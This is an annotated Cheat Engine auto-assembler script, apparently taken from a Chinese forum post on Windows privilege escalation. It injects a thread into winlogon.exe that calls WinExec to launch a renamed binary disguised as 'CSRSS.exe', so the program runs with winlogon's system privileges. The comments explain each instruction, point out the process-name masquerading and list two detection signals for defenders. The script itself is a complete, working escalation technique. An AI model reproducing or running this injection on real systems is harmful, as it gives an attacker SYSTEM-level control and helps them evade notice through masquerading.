
windows提权

winlogon.exe
KERNEL32.WinExec

[ENABLE]
// Cheat Engine auto-assembler script; the target process and the API it
// resolves are named in the two lines above this script (winlogon.exe,
// KERNEL32.WinExec). CE AA treats numbers as hexadecimal: 800 = 0x800.
// GlobalAlloc: reserve 0x800 bytes inside the target process for the code
// and the string below; the symbol lengfeng refers to that region.
GlobalAlloc(lengfeng,800)
label(xxx)                        // forward-declare the string label used by mov rcx,xxx


// Entry point of the thread started by createthread() below.
// Microsoft x64 ABI: rcx = lpCmdLine, edx = uCmdShow; WinExec(xxx, 5).
// Because the caller is winlogon.exe, the child it launches runs in
// winlogon's security context — this is the "提权" (privilege escalation)
// the post's title refers to.
lengfeng:
push rdi
sub rsp,20                        // 0x20 = shadow space for the Win64 call below
mov edx,5                         // uCmdShow = 5 (SW_SHOW)
mov rcx,xxx                       // lpCmdLine = address of the path string at xxx
call KERNEL32.WinExec
add Rsp,20                        // release the shadow space
pop rdi
ret




xxx://cheatengine-x86_64.exe — the backed-up and renamed copy of the CE binary (path below)
// NUL-terminated path string stored in the injected region. Note the file
// name CSRSS.exe under a user-writable folder: a core-system process name
// used outside System32, i.e. process-name masquerading.
db 'C:\Kele\0.7LKele\360safe\Crack\ce6.1\CSRSS.exe',0


// createthread: CE creates a new thread in winlogon.exe at lengfeng
// (remote-thread injection). Defender's view — two telemetry points:
//   1. a non-system process creating a thread inside winlogon.exe;
//   2. winlogon.exe spawning an unexpected child (here "CSRSS.exe" from a
//      non-System32 path).
createthread(lengfeng)
[DISABLE]
// Disable only frees the injected region; nothing here terminates the
// child that was already launched.
dealloc(lengfeng)


https://www.freebuf.com/articles/system/184289.html
https://tieba.baidu.com/p/6693704985?red_tag=0075834493
